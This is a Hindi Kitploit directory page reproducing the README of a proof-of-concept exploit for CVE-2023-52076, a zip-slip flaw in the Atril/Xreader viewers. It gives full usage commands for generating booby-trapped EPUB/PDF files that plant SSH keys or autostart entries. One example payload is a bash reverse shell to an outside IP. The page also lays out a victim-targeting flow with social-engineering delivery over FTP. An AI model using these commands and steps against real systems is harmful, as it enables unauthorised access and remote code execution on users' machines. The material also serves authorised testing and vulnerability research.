Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-52076-PoC — PoC एक्सप्लॉइट CVE-2023-52076 के लिए - Atril/Xreader (MATE/Cinnamon) में zip-slip पाथ ट्रैवर्सल, जो विशेष रूप से तैयार EPUB के माध्यम से मनमानी फ़ाइल लेखन और RCE को सक्षम बनाता है। केवल अधिकृत सुरक्षा परीक्षण के लिए। | Kitploit
उपकरण/GitHubGitHub/groppoxx/cve-2023-52076-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगसामाजिक इंजीनियरिंगबाइनरी शोषण
GitHubgroppoxx/cve-2023-52076-poc

CVE-2023-52076-PoC

PoC एक्सप्लॉइट CVE-2023-52076 के लिए - Atril/Xreader (MATE/Cinnamon) में zip-slip पाथ ट्रैवर्सल, जो विशेष रूप से तैयार EPUB के माध्यम से मनमानी फ़ाइल लेखन और RCE को सक्षम बनाता है। केवल अधिकृत सुरक्षा परीक्षण के लिए।

रिपॉजिटरी देखें
324 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-52076-PoC

CVE-2023-52076 के लिए प्रमाण-अवधारणा, जो Atril/Xreader दस्तावेज़ व्यूअर में एक गंभीर पाथ ट्रैवर्सल और मनमाना फ़ाइल लेखन भेद्यता है, जो MATE डेस्कटॉप वातावरण को प्रभावित करती है।

स्क्रिप्ट zip-slip पथों के साथ एक निर्मित EPUB पेलोड जनरेट करती है, जो या तो SSH कॉन्फ़िगरेशन या ऑटोस्टार्ट डेस्कटॉप प्रविष्टियों को लक्षित करती है, जिससे लक्षित सिस्टम पर रिमोट कमांड निष्पादन संभव होता है।

यह क्या करता है

  1. दो शोषण मोड का समर्थन करता है: SSH कुंजी इंजेक्शन या ऑटोस्टार्ट RCE।
  2. RSA कुंजी-युग्म जनरेट करता है (केवल SSH मोड)।
  3. कमज़ोर निष्कर्षण को लक्षित करते हुए एम्बेडेड zip-slip पथों के साथ एक मान्य EPUB बनाता है।
  4. पेलोड को /proc/self/cwd गैजेट्स का उपयोग करके 5-9 ट्रैवर्सल पाथ वेरिएंट में लिखता है।
  5. .epub और .pdf प्रतियां बनाता है (दोनों भेद्यता को ट्रिगर करती हैं)।
  6. पेलोड संरचना को मान्य करता है और सभी प्रविष्टियों को सत्यापित करता है।
  7. वैकल्पिक रूप से पेलोड को अनाम FTP के माध्यम से अपलोड करता है।

आवश्यकताएँ

root@kitploit:~
Python 3.8+
ssh-keygen in PATH (SSH mode only)

त्वरित आरंभ

SSH मोड (अनुशंसित)

SSH पेलोड स्थानीय रूप से जनरेट करें:

root@kitploit:~
python3 cve_2023_52076.py --mode ssh

ऑटोस्टार्ट मोड

कस्टम कमांड के साथ ऑटोस्टार्ट RCE पेलोड जनरेट करें:

root@kitploit:~
python3 cve_2023_52076.py --mode autostart --command "id > /tmp/pwned.txt"

पूर्ण उदाहरण

FTP अपलोड के साथ SSH मोड

root@kitploit:~
python3 cve_2023_52076.py \
  --mode ssh \
  --name slippy-ssh \
  --key ./keys/atril_rsa \
  --output-dir ./payloads \
  --upload \
  --host ftp.target.local \
  --ftp-dir pub

उदाहरण आउटपुट:

root@kitploit:~
[2026-07-27T14:23:45Z] [*] Generating RSA-3072 keypair: ./keys/atril_rsa
[2026-07-27T14:23:47Z] [*] Building EPUB with 9 zip-slip entries
[2026-07-27T14:23:47Z] [*] Validating payload: ./payloads/slippy-ssh.epub
[2026-07-27T14:23:47Z] [+] Validated 9 payload entries
[2026-07-27T14:23:47Z] [*] Connecting to FTP ftp.target.local:21
[2026-07-27T14:23:48Z] [*] Uploading ./payloads/slippy-ssh.epub as slippy-ssh.epub
[2026-07-27T14:23:48Z] [+] Upload complete. Remote directory listing:
-rw-r--r-- 1 0 0 2048 Jul 27 14:23 slippy-ssh.epub

[+] Payload ready
Mode:        SSH (authorized_keys)
Private key: ./keys/atril_rsa (mode 600)
Public key:  ./keys/atril_rsa.pub
Fingerprint: 3072 SHA256:abcd1234... atril-poc (RSA)
EPUB:        ./payloads/slippy-ssh.epub
PDF copy:    ./payloads/slippy-ssh.pdf

[+] SSH login remains manual:
    ssh -i ./keys/atril_rsa -o IdentitiesOnly=yes <user>@<target>

FTP अपलोड के साथ ऑटोस्टार्ट मोड

root@kitploit:~
python3 cve_2023_52076.py \
  --mode autostart \
  --command "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" \
  --name slippy-rce \
  --output-dir ./payloads \
  --upload \
  --host ftp.target.local \
  --ftp-dir pub

उदाहरण आउटपुट:

root@kitploit:~
[2026-07-27T14:25:10Z] [*] Building EPUB with 5 zip-slip entries
[2026-07-27T14:25:10Z] [*] Validating payload: ./payloads/slippy-rce.epub
[2026-07-27T14:25:10Z] [+] Validated 5 payload entries
[2026-07-27T14:25:10Z] [*] Connecting to FTP ftp.target.local:21
[2026-07-27T14:25:11Z] [*] Uploading ./payloads/slippy-rce.epub as slippy-rce.epub
[2026-07-27T14:25:11Z] [+] Upload complete.

[+] Payload ready
Mode:       Autostart (.desktop RCE)
Command:    bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
EPUB:       ./payloads/slippy-rce.epub
PDF copy:   ./payloads/slippy-rce.pdf

[+] Victim must logout/login for autostart to trigger

वैकल्पिक फ़्लैग्स

root@kitploit:~
--mode {ssh,autostart}
   Payload mode. Default: ssh
   ssh: Inject SSH authorized_keys (no victim interaction needed after file opens).
   autostart: Create .desktop RCE in autostart (triggers on next logout/login).

--command <CMD>
   Payload command for --mode autostart. Required if --mode autostart.
   Example: --command "id > /tmp/pwned.txt"

--name <NAME>
   Local payload basename. Default: base-clean

--key <PATH>
   Private key path (SSH mode only). Default: slippy_rsa

--key-bits <BITS>
   RSA key size (SSH mode only). Options: 2048, 3072, 4096. Default: 3072

--output-dir <DIR>
   Output directory for .epub/.pdf. Default: output

--upload
   Upload the payload to FTP after generating.

--host <HOST>
   FTP target host or IP. Required if --upload is set.

--port <PORT>
   FTP port. Default: 21

--ftp-dir <DIR>
   Remote FTP directory, e.g. pub.

--ftp-user <USER>
   FTP username. Default: anonymous

--ftp-password <PWD>
   FTP password. Default: anonymous@

--remote-name <NAME>
   Remote EPUB filename. Default: ludwig.epub

--upload-pdf
   Upload the .pdf copy instead of the .epub.

--force
   Replace existing output and key files.

--timeout <SECONDS>
   FTP connection timeout. Default: 10.0

--only-final
   Hide progress logs and print only the final summary.

--no-color
   Disable ANSI colors.

--debug
   Print executed subprocess commands (ssh-keygen).

शोषण प्रवाह

SSH मोड

  1. पेलोड जनरेट करें: स्क्रिप्ट authorized_keys पथों में सार्वजनिक कुंजी के साथ EPUB बनाती है।
  2. सोशल इंजीनियरिंग: लक्ष्य को EPUB/PDF भेजें (ईबुक के रूप में प्रच्छन्न)।
  3. पीड़ित फ़ाइल खोलता है: Atril/Xreader EPUB सामग्री निकालता है।
  4. पाथ ट्रैवर्सल: कमज़ोर कोड सार्वजनिक कुंजी को ~/.ssh/authorized_keys पर लिखता है।
  5. SSH एक्सेस: हमलावर निजी कुंजी का उपयोग करके कनेक्ट होता है।

ऑटोस्टार्ट मोड

  1. पेलोड जनरेट करें: स्क्रिप्ट ऑटोस्टार्ट पथों में .desktop प्रविष्टि के साथ EPUB बनाती है।
  2. सोशल इंजीनियरिंग: लक्ष्य को EPUB/PDF भेजें।
  3. पीड़ित फ़ाइल खोलता है: Atril/Xreader EPUB सामग्री निकालता है।
  4. पाथ ट्रैवर्सल: कमज़ोर कोड .desktop को ~/.config/autostart/ पर लिखता है।
  5. ट्रिगर: अगले लॉगआउट/लॉगिन पर, .desktop फ़ाइल कमांड को स्वतः निष्पादित करती है।

मुख्य बिंदु

  • किसी उपयोगकर्ता नाम की आवश्यकता नहीं: /proc/self/cwd गैजेट निष्कर्षण समय पर हल हो जाता है।
  • एकाधिक पाथ वेरिएंट: SSH के लिए 9 पथ, ऑटोस्टार्ट के लिए 5, निर्देशिका गहराइयों में सफलता को अधिकतम करता है।
  • कोई फ़ाइल अधिलेखन नहीं: केवल नई फ़ाइलें बनाता है (CVE सीमा का सम्मान करता है)।
  • ऑफ़लाइन मोड: FTP डिलीवरी के बिना पेलोड जनरेट करें (केवल आवश्यक होने पर --upload का उपयोग करें)।
  • लचीले कमांड: ऑटोस्टार्ट मोड किसी भी bash कमांड का समर्थन करता है।
  • SSH मोड तत्काल है: फ़ाइल खुलने के बाद पीड़ित के साथ कोई इंटरैक्शन नहीं होता।
  • ऑटोस्टार्ट के लिए पुनः लॉगिन आवश्यक: RCE ट्रिगर करने के लिए पीड़ित को लॉगआउट/लॉगिन करना होगा।

नोट्स

  • प्रभावित संस्करण: Atril (MATE DE), Xreader (Cinnamon, Linux Mint) < 1.26.2।
  • परीक्षण किया गया: Kali Linux, Parrot OS, Ubuntu-Mate, Xubuntu पर।
  • पीड़ित को कमज़ोर व्यूअर में निर्मित दस्तावेज़ खोलना आवश्यक है।
  • ऑफ़लाइन कार्य करता है; शोषण के दौरान हमलावर को कोई नेटवर्क कॉलबैक नहीं होता।
  • सर्वोत्तम अभ्यास: प्रत्यक्ष होस्टिंग से बचने के लिए FTP (--upload) के माध्यम से डिलीवर करें।

कानूनी

यह PoC अधिकृत सुरक्षा परीक्षण, प्रयोगशाला वातावरण और भेद्यता सत्यापन के लिए है। इसे बिना स्पष्ट अनुमति के सिस्टम के विरुद्ध उपयोग न करें।

टूल डाउनलोड करें